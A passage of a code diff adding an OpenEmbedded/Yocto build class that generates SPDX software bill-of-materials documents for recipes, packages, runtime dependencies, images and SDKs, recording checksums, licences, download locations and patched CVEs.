+ source_date_epoch = int(source_date_epoch)
+
+ sha1s = []
+ spdx_files = []
+
+ file_counter = 1
+ for subdir, dirs, files in os.walk(topdir):
+ dirs[:] = [d for d in dirs if d not in ignore_dirs]
+ if subdir == str(topdir):
+ dirs[:] = [d for d in dirs if d not in ignore_top_level_dirs]
+
+ for file in files:
+ filepath = Path(subdir) / file
+ filename = str(filepath.relative_to(topdir))
+
+ if not filepath.is_symlink() and filepath.is_file():
+ spdx_file = oe.spdx.SPDXFile()
+ spdx_file.SPDXID = get_spdxid(file_counter)
+ for t in get_types(filepath):
+ spdx_file.fileTypes.append(t)
+ spdx_file.fileName = filename
+
+ if archive is not None:
+ with filepath.open("rb") as f:
+ info = archive.gettarinfo(fileobj=f)
+ info.name = filename
+ info.uid = 0
+ info.gid = 0
+ info.uname = "root"
+ info.gname = "root"
+
+ if source_date_epoch is not None and info.mtime > source_date_epoch:
+ info.mtime = source_date_epoch
+
+ archive.addfile(info, f)
+
+ sha1 = bb.utils.sha1_file(filepath)
+ sha1s.append(sha1)
+ spdx_file.checksums.append(oe.spdx.SPDXChecksum(
+ algorithm="SHA1",
+ checksumValue=sha1,
+ ))
+ spdx_file.checksums.append(oe.spdx.SPDXChecksum(
+ algorithm="SHA256",
+ checksumValue=bb.utils.sha256_file(filepath),
+ ))
+
+ if "SOURCE" in spdx_file.fileTypes:
+ extracted_lics = extract_licenses(filepath)
+ if extracted_lics:
+ spdx_file.licenseInfoInFiles = extracted_lics
+
+ doc.files.append(spdx_file)
+ doc.add_relationship(spdx_pkg, "CONTAINS", spdx_file)
+ spdx_pkg.hasFiles.append(spdx_file.SPDXID)
+
+ spdx_files.append(spdx_file)
+
+ file_counter += 1
+
+ sha1s.sort()
+ verifier = hashlib.sha1()
+ for v in sha1s:
+ verifier.update(v.encode("utf-8"))
+ spdx_pkg.packageVerificationCode.packageVerificationCodeValue = verifier.hexdigest()
+
+ return spdx_files
+
+
+def add_package_sources_from_debug(d, package_doc, spdx_package, package, package_files, sources):
+ from pathlib import Path
+ import hashlib
+ import oe.packagedata
+ import oe.spdx
+
+ debug_search_paths = [
+ Path(d.getVar('PKGD')),
+ Path(d.getVar('STAGING_DIR_TARGET')),
+ Path(d.getVar('STAGING_DIR_NATIVE')),
+ Path(d.getVar('STAGING_KERNEL_DIR')),
+ ]
+
+ pkg_data = oe.packagedata.read_subpkgdata_extended(package, d)
+
+ if pkg_data is None:
+ return
+
+ for file_path, file_data in pkg_data["files_info"].items():
+ if not "debugsrc" in file_data:
+ continue
+
+ for pkg_file in package_files:
+ if file_path.lstrip("/") == pkg_file.fileName.lstrip("/"):
+ break
+ else:
+ bb.fatal("No package file found for %s" % str(file_path))
+ continue
+
+ for debugsrc in file_data["debugsrc"]:
+ ref_id = "NOASSERTION"
+ for search in debug_search_paths:
+ if debugsrc.startswith("/usr/src/kernel"):
+ debugsrc_path = search / debugsrc.replace('/usr/src/kernel/', '')
+ else:
+ debugsrc_path = search / debugsrc.lstrip("/")
+ if not debugsrc_path.exists():
+ continue
+
+ file_sha256 = bb.utils.sha256_file(debugsrc_path)
+
+ if file_sha256 in sources:
+ source_file = sources[file_sha256]
+
+ doc_ref = package_doc.find_external_document_ref(source_file.doc.documentNamespace)
+ if doc_ref is None:
+ doc_ref = oe.spdx.SPDXExternalDocumentRef()
+ doc_ref.externalDocumentId = "DocumentRef-dependency-" + source_file.doc.name
+ doc_ref.spdxDocument = source_file.doc.documentNamespace
+ doc_ref.checksum.algorithm = "SHA1"
+ doc_ref.checksum.checksumValue = source_file.doc_sha1
+ package_doc.externalDocumentRefs.append(doc_ref)
+
+ ref_id = "%s:%s" % (doc_ref.externalDocumentId, source_file.file.SPDXID)
+ else:
+ bb.debug(1, "Debug source %s with SHA256 %s not found in any dependency" % (str(debugsrc_path), file_sha256))
+ break
+ else:
+ bb.debug(1, "Debug source %s not found" % debugsrc)
+
+ package_doc.add_relationship(pkg_file, "GENERATED_FROM", ref_id, comment=debugsrc)
+
+def collect_dep_recipes(d, doc, spdx_recipe):
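+ # Read the SPDX document of every recipe this one depends on (via
+ # do_create_spdx task dependencies), register each as an external
+ # document reference, record a BUILD_DEPENDENCY_OF relationship against
+ # this recipe's SPDX package and return the collected DepRecipe entries.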
+ from pathlib import Path
+ import oe.sbom
+ import oe.spdx
+
+ deploy_dir_spdx = Path(d.getVar("DEPLOY_DIR_SPDX"))
+
+ dep_recipes = []
+ taskdepdata = d.getVar("BB_TASKDEPDATA", False)
+ deps = sorted(set(
+ dep[0] for dep in taskdepdata.values() if
+ dep[1] == "do_create_spdx" and dep[0] != d.getVar("PN")
+ ))
+ for dep_pn in deps:
+ dep_recipe_path = deploy_dir_spdx / "recipes" / ("recipe-%s.spdx.json" % dep_pn)
+
+ spdx_dep_doc, spdx_dep_sha1 = oe.sbom.read_doc(dep_recipe_path)
+
+ for pkg in spdx_dep_doc.packages:
+ if pkg.name == dep_pn:
+ spdx_dep_recipe = pkg
+ break
+ else:
+ continue
+
+ dep_recipes.append(oe.sbom.DepRecipe(spdx_dep_doc, spdx_dep_sha1, spdx_dep_recipe))
+
+ dep_recipe_ref = oe.spdx.SPDXExternalDocumentRef()
+ dep_recipe_ref.externalDocumentId = "DocumentRef-dependency-" + spdx_dep_doc.name
+ dep_recipe_ref.spdxDocument = spdx_dep_doc.documentNamespace
+ dep_recipe_ref.checksum.algorithm = "SHA1"
+ dep_recipe_ref.checksum.checksumValue = spdx_dep_sha1
+
+ doc.externalDocumentRefs.append(dep_recipe_ref)
+
+ doc.add_relationship(
+ "%s:%s" % (dep_recipe_ref.externalDocumentId, spdx_dep_recipe.SPDXID),
+ "BUILD_DEPENDENCY_OF",
+ spdx_recipe
+ )
+
+ return dep_recipes
+
+collect_dep_recipes[vardepsexclude] += "BB_TASKDEPDATA"
+collect_dep_recipes[vardeps] += "DEPENDS"
+
+def collect_dep_sources(d, dep_recipes):
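+ # Build a lookup table from the SHA256 of every SOURCE file in the
+ # (non-native) dependency SPDX documents to its DepSource entry, so that
+ # debug sources can later be matched back to the recipe providing them.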
+ import oe.sbom
+
+ sources = {}
+ for dep in dep_recipes:
+ # Don't collect sources from native recipes as they
+ # match non-native sources also.
+ if recipe_spdx_is_native(d, dep.recipe):
+ continue
+ recipe_files = set(dep.recipe.hasFiles)
+
+ for spdx_file in dep.doc.files:
+ if spdx_file.SPDXID not in recipe_files:
+ continue
+
+ if "SOURCE" in spdx_file.fileTypes:
+ for checksum in spdx_file.checksums:
+ if checksum.algorithm == "SHA256":
+ sources[checksum.checksumValue] = oe.sbom.DepSource(dep.doc, dep.doc_sha1, dep.recipe, spdx_file)
+ break
+
+ return sources
+
+def add_download_packages(d, doc, recipe):
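+ # Describe each remote SRC_URI entry as its own SPDXPackage, recording
+ # the download location (including the revision for SCM fetchers) and any
+ # expected checksums, and mark it as a BUILD_DEPENDENCY_OF the recipe.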
+ import os.path
+ from bb.fetch2 import decodeurl, CHECKSUM_LIST
+ import bb.process
+ import oe.spdx
+ import oe.sbom
+
+ for download_idx, src_uri in enumerate(d.getVar('SRC_URI').split()):
+ f = bb.fetch2.FetchData(src_uri, d)
+
+ for name in f.names:
+ package = oe.spdx.SPDXPackage()
+ package.name = "%s-source-%d" % (d.getVar("PN"), download_idx + 1)
+ package.SPDXID = oe.sbom.get_download_spdxid(d, download_idx + 1)
+
+ if f.type == "file":
+ continue
+
+ uri = f.type
+ proto = getattr(f, "proto", None)
+ if proto is not None:
+ uri = uri + "+" + proto
+ uri = uri + "://" + f.host + f.path
+
+ if f.method.supports_srcrev():
+ uri = uri + "@" + f.revisions[name]
+
+ if f.method.supports_checksum(f):
+ for checksum_id in CHECKSUM_LIST:
+ if checksum_id.upper() not in oe.spdx.SPDXPackage.ALLOWED_CHECKSUMS:
+ continue
+
+ expected_checksum = getattr(f, "%s_expected" % checksum_id)
+ if expected_checksum is None:
+ continue
+
+ c = oe.spdx.SPDXChecksum()
+ c.algorithm = checksum_id.upper()
+ c.checksumValue = expected_checksum
+ package.checksums.append(c)
+
+ package.downloadLocation = uri
+ doc.packages.append(package)
+ doc.add_relationship(doc, "DESCRIBES", package)
+ # In the future, we might be able to do more fancy dependencies,
+ # but this should be sufficient for now
+ doc.add_relationship(package, "BUILD_DEPENDENCY_OF", recipe)
+
+python do_create_spdx() {
+ from datetime import datetime, timezone
+ import oe.sbom
+ import oe.spdx
+ import uuid
+ from pathlib import Path
+ from contextlib import contextmanager
+ import oe.cve_check
+
+ @contextmanager
+ def optional_tarfile(name, guard, mode="w"):
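+ # Yield a gzip-compressed tar stream at 'name' when 'guard' is true,
+ # otherwise yield None so the caller can skip archiving entirely.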
+ import tarfile
+ import gzip
+
+ if guard:
+ name.parent.mkdir(parents=True, exist_ok=True)
+ with gzip.open(name, mode=mode + "b") as f:
+ with tarfile.open(fileobj=f, mode=mode + "|") as tf:
+ yield tf
+ else:
+ yield None
+
+
+ deploy_dir_spdx = Path(d.getVar("DEPLOY_DIR_SPDX"))
+ spdx_workdir = Path(d.getVar("SPDXWORK"))
+ include_sources = d.getVar("SPDX_INCLUDE_SOURCES") == "1"
+ archive_sources = d.getVar("SPDX_ARCHIVE_SOURCES") == "1"
+ archive_packaged = d.getVar("SPDX_ARCHIVE_PACKAGED") == "1"
+
+ creation_time = datetime.now(tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
+
+ doc = oe.spdx.SPDXDocument()
+
+ doc.name = "recipe-" + d.getVar("PN")
+ doc.documentNamespace = get_doc_namespace(d, doc)
+ doc.creationInfo.created = creation_time
+ doc.creationInfo.comment = "This document was created by analyzing recipe files during the build."
+ doc.creationInfo.licenseListVersion = d.getVar("SPDX_LICENSE_DATA")["licenseListVersion"]
+ doc.creationInfo.creators.append("Tool: OpenEmbedded Core create-spdx.bbclass")
+ doc.creationInfo.creators.append("Organization: %s" % d.getVar("SPDX_ORG"))
+ doc.creationInfo.creators.append("Person: N/A ()")
+
+ recipe = oe.spdx.SPDXPackage()
+ recipe.name = d.getVar("PN")
+ recipe.versionInfo = d.getVar("PV")
+ recipe.SPDXID = oe.sbom.get_recipe_spdxid(d)
+ recipe.supplier = d.getVar("SPDX_SUPPLIER")
+ if bb.data.inherits_class("native", d) or bb.data.inherits_class("cross", d):
+ recipe.annotations.append(create_annotation(d, "isNative"))
+
+ homepage = d.getVar("HOMEPAGE")
+ if homepage:
+ recipe.homepage = homepage
+
+ license = d.getVar("LICENSE")
+ if license:
+ recipe.licenseDeclared = convert_license_to_spdx(license, doc, d)
+
+ summary = d.getVar("SUMMARY")
+ if summary:
+ recipe.summary = summary
+
+ description = d.getVar("DESCRIPTION")
+ if description:
+ recipe.description = description
+
+ if d.getVar("SPDX_CUSTOM_ANNOTATION_VARS"):
+ for var in d.getVar('SPDX_CUSTOM_ANNOTATION_VARS').split():
+ recipe.annotations.append(create_annotation(d, var + "=" + d.getVar(var)))
+
+ # Some CVEs may be patched during the build process without incrementing the version number,
+ # so querying for CVEs based on the CPE id can lead to false positives. To account for this,
+ # save the CVEs fixed by patches to the source information field in the SPDX.
+ patched_cves = oe.cve_check.get_patched_cves(d)
+ patched_cves = list(patched_cves)
+ patched_cves = ' '.join(patched_cves)
+ if patched_cves:
+ recipe.sourceInfo = "CVEs fixed: " + patched_cves
+
+ cpe_ids = oe.cve_check.get_cpe_ids(d.getVar("CVE_PRODUCT"), d.getVar("CVE_VERSION"))
+ if cpe_ids:
+ for cpe_id in cpe_ids:
+ cpe = oe.spdx.SPDXExternalReference()
+ cpe.referenceCategory = "SECURITY"
+ cpe.referenceType = "http://spdx.org/rdf/references/cpe23Type"
+ cpe.referenceLocator = cpe_id
+ recipe.externalRefs.append(cpe)
+
+ doc.packages.append(recipe)
+ doc.add_relationship(doc, "DESCRIBES", recipe)
+
+ add_download_packages(d, doc, recipe)
+
+ if process_sources(d) and include_sources:
+ recipe_archive = deploy_dir_spdx / "recipes" / (doc.name + ".tar.gz")
+ with optional_tarfile(recipe_archive, archive_sources) as archive:
+ spdx_get_src(d)
+
+ add_package_files(
+ d,
+ doc,
+ recipe,
+ spdx_workdir,
+ lambda file_counter: "SPDXRef-SourceFile-%s-%d" % (d.getVar("PN"), file_counter),
+ lambda filepath: ["SOURCE"],
+ ignore_dirs=[".git"],
+ ignore_top_level_dirs=["temp"],
+ archive=archive,
+ )
+
+ if archive is not None:
+ recipe.packageFileName = str(recipe_archive.name)
+
+ dep_recipes = collect_dep_recipes(d, doc, recipe)
+
+ doc_sha1 = oe.sbom.write_doc(d, doc, "recipes", indent=get_json_indent(d))
+ dep_recipes.append(oe.sbom.DepRecipe(doc, doc_sha1, recipe))
+
+ recipe_ref = oe.spdx.SPDXExternalDocumentRef()
+ recipe_ref.externalDocumentId = "DocumentRef-recipe-" + recipe.name
+ recipe_ref.spdxDocument = doc.documentNamespace
+ recipe_ref.checksum.algorithm = "SHA1"
+ recipe_ref.checksum.checksumValue = doc_sha1
+
+ sources = collect_dep_sources(d, dep_recipes)
+ found_licenses = {license.name:recipe_ref.externalDocumentId + ":" + license.licenseId for license in doc.hasExtractedLicensingInfos}
+
+ if not recipe_spdx_is_native(d, recipe):
+ bb.build.exec_func("read_subpackage_metadata", d)
+
+ pkgdest = Path(d.getVar("PKGDEST"))
+ for package in d.getVar("PACKAGES").split():
+ if not oe.packagedata.packaged(package, d):
+ continue
+
+ package_doc = oe.spdx.SPDXDocument()
+ pkg_name = d.getVar("PKG:%s" % package) or package
+ package_doc.name = pkg_name
+ package_doc.documentNamespace = get_doc_namespace(d, package_doc)
+ package_doc.creationInfo.created = creation_time
+ package_doc.creationInfo.comment = "This document was created by analyzing packages created during the build."
+ package_doc.creationInfo.licenseListVersion = d.getVar("SPDX_LICENSE_DATA")["licenseListVersion"]
+ package_doc.creationInfo.creators.append("Tool: OpenEmbedded Core create-spdx.bbclass")
+ package_doc.creationInfo.creators.append("Organization: %s" % d.getVar("SPDX_ORG"))
+ package_doc.creationInfo.creators.append("Person: N/A ()")
+ package_doc.externalDocumentRefs.append(recipe_ref)
+
+ package_license = d.getVar("LICENSE:%s" % package) or d.getVar("LICENSE")
+
+ spdx_package = oe.spdx.SPDXPackage()
+
+ spdx_package.SPDXID = oe.sbom.get_package_spdxid(pkg_name)
+ spdx_package.name = pkg_name
+ spdx_package.versionInfo = d.getVar("PV")
+ spdx_package.licenseDeclared = convert_license_to_spdx(package_license, package_doc, d, found_licenses)
+ spdx_package.supplier = d.getVar("SPDX_SUPPLIER")
+
+ package_doc.packages.append(spdx_package)
+
+ package_doc.add_relationship(spdx_package, "GENERATED_FROM", "%s:%s" % (recipe_ref.externalDocumentId, recipe.SPDXID))
+ package_doc.add_relationship(package_doc, "DESCRIBES", spdx_package)
+
+ package_archive = deploy_dir_spdx / "packages" / (package_doc.name + ".tar.gz")
+ with optional_tarfile(package_archive, archive_packaged) as archive:
+ package_files = add_package_files(
+ d,
+ package_doc,
+ spdx_package,
+ pkgdest / package,
+ lambda file_counter: oe.sbom.get_packaged_file_spdxid(pkg_name, file_counter),
+ lambda filepath: ["BINARY"],
+ ignore_top_level_dirs=['CONTROL', 'DEBIAN'],
+ archive=archive,
+ )
+
+ if archive is not None:
+ spdx_package.packageFileName = str(package_archive.name)
+
+ add_package_sources_from_debug(d, package_doc, spdx_package, package, package_files, sources)
+
+ oe.sbom.write_doc(d, package_doc, "packages", indent=get_json_indent(d))
+}
+# NOTE: depending on do_unpack is a hack that is necessary to get its dependencies for archiving the source
+addtask do_create_spdx after do_package do_packagedata do_unpack before do_populate_sdk do_build do_rm_work
+
+SSTATETASKS += "do_create_spdx"
+do_create_spdx[sstate-inputdirs] = "${SPDXDEPLOY}"
+do_create_spdx[sstate-outputdirs] = "${DEPLOY_DIR_SPDX}"
+
+python do_create_spdx_setscene () {
+ sstate_setscene(d)
+}
+addtask do_create_spdx_setscene
+
+do_create_spdx[dirs] = "${SPDXWORK}"
+do_create_spdx[cleandirs] = "${SPDXDEPLOY} ${SPDXWORK}"
+do_create_spdx[depends] += "${PATCHDEPENDENCY}"
+do_create_spdx[deptask] = "do_create_spdx"
+
+def collect_package_providers(d):
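+ # Map every runtime provide (each package name plus its RPROVIDES) to the
+ # package providing it, across this recipe and all of its task
+ # dependencies, for resolving RDEPENDS in the runtime SPDX documents.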
+ from pathlib import Path
+ import oe.sbom
+ import oe.spdx
+ import json
+
+ deploy_dir_spdx = Path(d.getVar("DEPLOY_DIR_SPDX"))
+
+ providers = {}
+
+ taskdepdata = d.getVar("BB_TASKDEPDATA", False)
+ deps = sorted(set(
+ dep[0] for dep in taskdepdata.values() if dep[0] != d.getVar("PN")
+ ))
+ deps.append(d.getVar("PN"))
+
+ for dep_pn in deps:
+ recipe_data = oe.packagedata.read_pkgdata(dep_pn, d)
+
+ for pkg in recipe_data.get("PACKAGES", "").split():
+
+ pkg_data = oe.packagedata.read_subpkgdata_dict(pkg, d)
+ rprovides = set(n for n, _ in bb.utils.explode_dep_versions2(pkg_data.get("RPROVIDES", "")).items())
+ rprovides.add(pkg)
+
+ for r in rprovides:
+ providers[r] = pkg
+
+ return providers
+
+collect_package_providers[vardepsexclude] += "BB_TASKDEPDATA"
+
+python do_create_runtime_spdx() {
+ from datetime import datetime, timezone
+ import oe.sbom
+ import oe.spdx
+ import oe.packagedata
+ from pathlib import Path
+
+ deploy_dir_spdx = Path(d.getVar("DEPLOY_DIR_SPDX"))
+ spdx_deploy = Path(d.getVar("SPDXRUNTIMEDEPLOY"))
+ is_native = bb.data.inherits_class("native", d) or bb.data.inherits_class("cross", d)
+
+ creation_time = datetime.now(tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
+
+ providers = collect_package_providers(d)
+
+ if not is_native:
+ bb.build.exec_func("read_subpackage_metadata", d)
+
+ dep_package_cache = {}
+
+ pkgdest = Path(d.getVar("PKGDEST"))
+ for package in d.getVar("PACKAGES").split():
+ localdata = bb.data.createCopy(d)
+ pkg_name = d.getVar("PKG:%s" % package) or package
+ localdata.setVar("PKG", pkg_name)
+ localdata.setVar('OVERRIDES', d.getVar("OVERRIDES", False) + ":" + package)
+
+ if not oe.packagedata.packaged(package, localdata):
+ continue
+
+ pkg_spdx_path = deploy_dir_spdx / "packages" / (pkg_name + ".spdx.json")
+
+ package_doc, package_doc_sha1 = oe.sbom.read_doc(pkg_spdx_path)
+
+ for p in package_doc.packages:
+ if p.name == pkg_name:
+ spdx_package = p
+ break
+ else:
+ bb.fatal("Package '%s' not found in %s" % (pkg_name, pkg_spdx_path))
+
+ runtime_doc = oe.spdx.SPDXDocument()
+ runtime_doc.name = "runtime-" + pkg_name
+ runtime_doc.documentNamespace = get_doc_namespace(localdata, runtime_doc)
+ runtime_doc.creationInfo.created = creation_time
+ runtime_doc.creationInfo.comment = "This document was created by analyzing package runtime dependencies."
+ runtime_doc.creationInfo.licenseListVersion = d.getVar("SPDX_LICENSE_DATA")["licenseListVersion"]
+ runtime_doc.creationInfo.creators.append("Tool: OpenEmbedded Core create-spdx.bbclass")
+ runtime_doc.creationInfo.creators.append("Organization: %s" % d.getVar("SPDX_ORG"))
+ runtime_doc.creationInfo.creators.append("Person: N/A ()")
+
+ package_ref = oe.spdx.SPDXExternalDocumentRef()
+ package_ref.externalDocumentId = "DocumentRef-package-" + package
+ package_ref.spdxDocument = package_doc.documentNamespace
+ package_ref.checksum.algorithm = "SHA1"
+ package_ref.checksum.checksumValue = package_doc_sha1
+
+ runtime_doc.externalDocumentRefs.append(package_ref)
+
+ runtime_doc.add_relationship(
+ runtime_doc.SPDXID,
+ "AMENDS",
+ "%s:%s" % (package_ref.externalDocumentId, package_doc.SPDXID)
+ )
+
+ deps = bb.utils.explode_dep_versions2(localdata.getVar("RDEPENDS") or "")
+ seen_deps = set()
+ for dep, _ in deps.items():
+ if dep in seen_deps:
+ continue
+
+ if dep not in providers:
+ continue
+
+ dep = providers[dep]
+
+ if not oe.packagedata.packaged(dep, localdata):
+ continue
+
+ dep_pkg_data = oe.packagedata.read_subpkgdata_dict(dep, d)
+ dep_pkg = dep_pkg_data["PKG"]
+
+ if dep in dep_package_cache:
+ (dep_spdx_package, dep_package_ref) = dep_package_cache[dep]
+ else:
+ dep_path = deploy_dir_spdx / "packages" / ("%s.spdx.json" % dep_pkg)
+
+ spdx_dep_doc, spdx_dep_sha1 = oe.sbom.read_doc(dep_path)
+
+ for pkg in spdx_dep_doc.packages:
+ if pkg.name == dep_pkg:
+ dep_spdx_package = pkg
+ break
+ else:
+ bb.fatal("Package '%s' not found in %s" % (dep_pkg, dep_path))
+
+ dep_package_ref = oe.spdx.SPDXExternalDocumentRef()
+ dep_package_ref.externalDocumentId = "DocumentRef-runtime-dependency-" + spdx_dep_doc.name
+ dep_package_ref.spdxDocument = spdx_dep_doc.documentNamespace
+ dep_package_ref.checksum.algorithm = "SHA1"
+ dep_package_ref.checksum.checksumValue = spdx_dep_sha1
+
+ dep_package_cache[dep] = (dep_spdx_package, dep_package_ref)
+
+ runtime_doc.externalDocumentRefs.append(dep_package_ref)
+
+ runtime_doc.add_relationship(
+ "%s:%s" % (dep_package_ref.externalDocumentId, dep_spdx_package.SPDXID),
+ "RUNTIME_DEPENDENCY_OF",
+ "%s:%s" % (package_ref.externalDocumentId, spdx_package.SPDXID)
+ )
+ seen_deps.add(dep)
+
+ oe.sbom.write_doc(d, runtime_doc, "runtime", spdx_deploy, indent=get_json_indent(d))
+}
+
+addtask do_create_runtime_spdx after do_create_spdx before do_build do_rm_work
+SSTATETASKS += "do_create_runtime_spdx"
+do_create_runtime_spdx[sstate-inputdirs] = "${SPDXRUNTIMEDEPLOY}"
+do_create_runtime_spdx[sstate-outputdirs] = "${DEPLOY_DIR_SPDX}"
+
+python do_create_runtime_spdx_setscene () {
+ sstate_setscene(d)
+}
+addtask do_create_runtime_spdx_setscene
+
+do_create_runtime_spdx[dirs] = "${SPDXRUNTIMEDEPLOY}"
+do_create_runtime_spdx[cleandirs] = "${SPDXRUNTIMEDEPLOY}"
+do_create_runtime_spdx[rdeptask] = "do_create_spdx"
+
+def spdx_get_src(d):
+ """
+ Save the patched source of the recipe in SPDX_WORKDIR.
+ """
+ import shutil
+ spdx_workdir = d.getVar('SPDXWORK')
+ spdx_sysroot_native = d.getVar('STAGING_DIR_NATIVE')
+ pn = d.getVar('PN')
+
+ workdir = d.getVar("WORKDIR")
+
+ try:
+ # The kernel class functions require it to be on work-shared, so we don't change WORKDIR
+ if not is_work_shared_spdx(d):
+ # Change the WORKDIR so that do_unpack and do_patch run in another directory.
+ d.setVar('WORKDIR', spdx_workdir)
+ # Restore the original path to recipe's native sysroot (it's relative to WORKDIR).
+ d.setVar('STAGING_DIR_NATIVE', spdx_sysroot_native)
+
+ # Changing 'WORKDIR' also changes 'B', so create the 'B' directory in
+ # case the following tasks need it (for example, some recipes' do_patch
+ # requires 'B' to exist).
+ bb.utils.mkdirhier(d.getVar('B'))
+
+ bb.build.exec_func('do_unpack', d)
+ # Copy source of kernel to spdx_workdir
+ if is_work_shared_spdx(d):
+ share_src = d.getVar('WORKDIR')
+ d.setVar('WORKDIR', spdx_workdir)
+ d.setVar('STAGING_DIR_NATIVE', spdx_sysroot_native)
+ src_dir = spdx_workdir + "/" + d.getVar('PN')+ "-" + d.getVar('PV') + "-" + d.getVar('PR')
+ bb.utils.mkdirhier(src_dir)
+ if bb.data.inherits_class('kernel',d):
+ share_src = d.getVar('STAGING_KERNEL_DIR')
+ cmd_copy_share = "cp -rf " + share_src + "/* " + src_dir + "/"
+ cmd_copy_shared_res = os.popen(cmd_copy_share).read()
+ bb.note("cmd_copy_shared_result = " + cmd_copy_shared_res)
+
+ git_path = src_dir + "/.git"
+ if os.path.exists(git_path):
+ shutil.rmtree(git_path)
+
+ # Make sure gcc and kernel sources are patched only once
+ if not (d.getVar('SRC_URI') == "" or is_work_shared_spdx(d)):
+ bb.build.exec_func('do_patch', d)
+
+ # Some userland recipes have no source.
+ if not os.path.exists( spdx_workdir ):
+ bb.utils.mkdirhier(spdx_workdir)
+ finally:
+ d.setVar("WORKDIR", workdir)
+
+do_rootfs[recrdeptask] += "do_create_spdx do_create_runtime_spdx"
+do_rootfs[cleandirs] += "${SPDXIMAGEWORK}"
+
+ROOTFS_POSTUNINSTALL_COMMAND =+ "image_combine_spdx ; "
+
+do_populate_sdk[recrdeptask] += "do_create_spdx do_create_runtime_spdx"
+do_populate_sdk[cleandirs] += "${SPDXSDKWORK}"
+POPULATE_SDK_POST_HOST_COMMAND:append:task-populate-sdk = " sdk_host_combine_spdx; "
+POPULATE_SDK_POST_TARGET_COMMAND:append:task-populate-sdk = " sdk_target_combine_spdx; "
+
+python image_combine_spdx() {
+ import os
+ import oe.sbom
+ from pathlib import Path
+ from oe.rootfs import image_list_installed_packages
+
+ image_name = d.getVar("IMAGE_NAME")
+ image_link_name = d.getVar("IMAGE_LINK_NAME")
+ imgdeploydir = Path(d.getVar("IMGDEPLOYDIR"))
+ img_spdxid = oe.sbom.get_image_spdxid(image_name)
+ packages = image_list_installed_packages(d)
+
+ combine_spdx(d, image_name, imgdeploydir, img_spdxid, packages, Path(d.getVar("SPDXIMAGEWORK")))
+
+ def make_image_link(target_path, suffix):
+ if image_link_name:
+ link = imgdeploydir / (image_link_name + suffix)
+ if link != target_path:
+ link.symlink_to(os.path.relpath(target_path, link.parent))
+
+ spdx_tar_path = imgdeploydir / (image_name + ".spdx.tar.gz")
+ make_image_link(spdx_tar_path, ".spdx.tar.gz")
+}
+
+python sdk_host_combine_spdx() {
+ sdk_combine_spdx(d, "host")
+}
+
+python sdk_target_combine_spdx() {
+ sdk_combine_spdx(d, "target")
+}
+
+def sdk_combine_spdx(d, sdk_type):
+ import oe.sbom
+ from pathlib import Path
+ from oe.sdk import sdk_list_installed_packages
+
+ sdk_name = d.getVar("SDK_NAME") + "-" + sdk_type
+ sdk_deploydir = Path(d.getVar("SDKDEPLOYDIR"))
+ sdk_spdxid = oe.sbom.get_sdk_spdxid(sdk_name)
+ sdk_packages = sdk_list_installed_packages(d, sdk_type == "target")
+ combine_spdx(d, sdk_name, sdk_deploydir, sdk_spdxid, sdk_packages, Path(d.getVar('SPDXSDKWORK')))
+
+def combine_spdx(d, rootfs_name, rootfs_deploydir, rootfs_spdxid, packages, spdx_workdir):
+ import os
+ import oe.spdx
+ import oe.sbom
+ import io
+ import json
+ from datetime import timezone, datetime
+ from pathlib import Path
+ import tarfile
+ import gzip
+
+ creation_time = datetime.now(tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
+ deploy_dir_spdx = Path(d.getVar("DEPLOY_DIR_SPDX"))
+ source_date_epoch = d.getVar("SOURCE_DATE_EPOCH")
+
+ doc = oe.spdx.SPDXDocument()
+ doc.name = rootfs_name
+ doc.documentNamespace = get_doc_namespace(d, doc)
+ doc.creationInfo.created = creation_time
+ doc.creationInfo.comment = "This document was created by analyzing the source of the Yocto recipe during the build."
+ doc.creationInfo.licenseListVersion = d.getVar("SPDX_LICENSE_DATA")["licenseListVersion"]
+ doc.creationInfo.creators.append("Tool: OpenEmbedded Core create-spdx.bbclass")
+ doc.creationInfo.creators.append("Organization: %s" % d.getVar("SPDX_ORG"))
+ doc.creationInfo.creators.append("Person: N/A ()")
+
+ image = oe.spdx.SPDXPackage()
+ image.name = d.getVar("PN")
+ image.versionInfo = d.getVar("PV")
+ image.SPDXID = rootfs_spdxid
+ image.supplier = d.getVar("SPDX_SUPPLIER")
+
+ doc.packages.append(image)
+
+ for name in sorted(packages.keys()):
+ pkg_spdx_path = deploy_dir_spdx / "packages" / (name + ".spdx.json")
+ pkg_doc, pkg_doc_sha1 = oe.sbom.read_doc(pkg_spdx_path)
+
+ for p in pkg_doc.packages:
+ if p.name == name:
+ pkg_ref = oe.spdx.SPDXExternalDocumentRef()
+ pkg_ref.externalDocumentId = "DocumentRef-%s" % pkg_doc.name
+ pkg_ref.spdxDocument = pkg_doc.documentNamespace
+ pkg_ref.checksum.algorithm = "SHA1"
+ pkg_ref.checksum.checksumValue = pkg_doc_sha1
+
+ doc.externalDocumentRefs.append(pkg_ref)
+ doc.add_relationship(image, "CONTAINS", "%s:%s" % (pkg_ref.externalDocumentId, p.SPDXID))
+ break
+ else:
+ bb.fatal("Unable to find package with name '%s' in SPDX file %s" % (name, pkg_spdx_path))
+
+ runtime_spdx_path = deploy_dir_spdx / "runtime" / ("runtime-" + name + ".spdx.json")
+ runtime_doc, runtime_doc_sha1 = oe.sbom.read_doc(runtime_spdx_path)
+
+ runtime_ref = oe.spdx.SPDXExternalDocumentRef()
+ runtime_ref.externalDocumentId = "DocumentRef-%s" % runtime_doc.name
+ runtime_ref.spdxDocument = runtime_doc.documentNamespace
+ runtime_ref.checksum.algorithm = "SHA1"
+ runtime_ref.checksum.checksumValue = runtime_doc_sha1
+
+ # "OTHER" isn't ideal here, but I can't find a relationship that makes sense
+ doc.externalDocumentRefs.append(runtime_ref)
+ doc.add_relationship(
+ image,
+ "OTHER",
+ "%s:%s" % (runtime_ref.externalDocumentId, runtime_doc.SPDXID),
+ comment="Runtime dependencies for %s" % name
+ )
+
+ image_spdx_path = spdx_workdir / (rootfs_name + ".spdx.json")
+
+ with image_spdx_path.open("wb") as f:
+ doc.to_json(f, sort_keys=True, indent=get_json_indent(d))
+
+ num_threads = int(d.getVar("BB_NUMBER_THREADS"))
+
+ visited_docs = set()
+
+ index = {"documents": []}
+
+ spdx_tar_path = rootfs_deploydir / (rootfs_name + ".spdx.tar.gz")
+ with gzip.open(spdx_tar_path, "w") as f:
+ with tarfile.open(fileobj=f, mode="w|") as tar:
+ def collect_spdx_document(path):
+ nonlocal tar
+ nonlocal deploy_dir_spdx
+ nonlocal source_date_epoch
+ nonlocal index
+
+ if path in visited_docs:
